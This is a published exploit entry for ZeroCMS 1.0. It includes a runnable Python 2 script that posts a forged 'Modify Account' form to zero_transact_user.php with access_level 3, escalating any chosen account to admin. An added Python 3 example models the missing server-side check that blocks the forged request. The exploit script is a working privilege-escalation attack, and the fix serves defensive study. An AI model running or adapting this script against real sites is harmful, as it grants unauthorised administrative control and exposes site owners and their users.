ZeroCMS 1.0 - zero_transact_user.php, Handling Privilege Escalation



EKU-ID: 4088 CVE: OSVDB-ID:
Author: Tiago Carvalho Published: 2014-06-16 Verified: Verified


import sys,getopt,cookielib,urllib2,urllib
  
# ZeroCMS 1.0 
# zero_transact_user.php
# Improper form POST handling (parameter pollution)
# Vendor: Another Awesome Stuff 
# Product web page: http://www.aas9.in/zerocms/
# author: tiago.alexand@gmail.com
# Tested on: php 5.4.27
# OSVDB ID: 108025
# description
# Summary: ZeroCMS is a very simple Content Management
# System built using PHP and MySQL.
# The script zero_transact_user.php contains a Modify Account case
# whose execution context does not take the current user's permissions into consideration,
# allowing a malicious user to escalate their privileges to admin.
  
def exploit(host,email,name,userid):
   access_level = 3 # default for admin
   url = host + '/zero_transact_user.php' # the script handles user-related actions
   # access_level is sent as an ordinary form field alongside the account details
   args = { 'user_id':userid,'email':email, 'name':name,'access_level':access_level,'action':'Modify Account' }
   data = urllib.urlencode(args)
   cj = cookielib.CookieJar()
   opener = urllib2.build_opener(urllib2.HTTPCookieProcessor(cj))
   response = opener.open(url,data)
   print response.read()
      
def main(argv):
   host = ''
   email = ''
   accountname = ''
   userid = ''
   try:
      opts, args = getopt.getopt(argv,"hu:m:n:i:")
   except getopt.GetoptError:
      print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i <account id>'
      sys.exit(2)
   for opt, arg in opts:
      if opt == '-h':
         print 'zero_cms_privEscalation.py -u <host> -m <email> -n <account name> -i <account id>'
         sys.exit()
      elif opt == '-u':
         host = arg
      elif opt == '-m':
         email = arg
      elif opt == '-n':
         accountname = arg
      elif opt == '-i':
         userid = arg
   exploit(host,email,accountname,userid)
  
if __name__ == "__main__":
   main(sys.argv[1:])
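
The missing server-side check, modelled in Python 3 as an added example (not ZeroCMS code and not part of the original advisory): authority for a "Modify Account" request comes from the session, never from the posted user_id or access_level. The session layout, the in-memory users store, the Forbidden exception and the assumed valid level range are illustrative assumptions; the form field names and the admin level 3 come from the request above.

```python
ADMIN_LEVEL = 3  # the advisory's value for an admin account


class Forbidden(Exception):
    """Raised when the request is not authorised; nothing is modified."""


def modify_account(session, form, users):
    """Handle a 'Modify Account' POST; authority comes from the session only."""
    actor = users.get(session.get("user_id"))
    if actor is None:
        raise Forbidden("not logged in")
    is_admin = actor["access_level"] >= ADMIN_LEVEL
    try:
        target_id = int(form["user_id"])
        new_level = int(form["access_level"]) if "access_level" in form else None
    except (KeyError, TypeError, ValueError):
        raise Forbidden("malformed request")
    target = users.get(target_id)
    if target is None:
        raise Forbidden("unknown account")
    if target is not actor and not is_admin:
        raise Forbidden("cannot edit another user's account")
    if new_level is not None and new_level != target["access_level"]:
        # The client-supplied level is honoured only for an admin session.
        if not is_admin:
            raise Forbidden("access_level change requires admin")
        if not 1 <= new_level <= ADMIN_LEVEL:  # assumed valid range
            raise Forbidden("invalid access_level")
        target["access_level"] = new_level
    # Profile fields the account owner (or an admin) may change.
    for field in ("name", "email"):
        if field in form:
            target[field] = str(form[field])
    return target


def sample_users():
    """Constructed sample data: account 1 is an admin, account 2 is not."""
    return {
        1: {"name": "admin", "email": "admin@example.test", "access_level": ADMIN_LEVEL},
        2: {"name": "bob", "email": "bob@example.test", "access_level": 1},
    }


if __name__ == "__main__":
    users = sample_users()
    form = {"user_id": "2", "name": "bob", "email": "bob@example.test",
            "access_level": "3", "action": "Modify Account"}
    try:
        modify_account({"user_id": 2}, form, users)
    except Forbidden as exc:
        print("rejected:", exc)
```

All validation happens before any field is written, so a rejected request leaves the account unchanged.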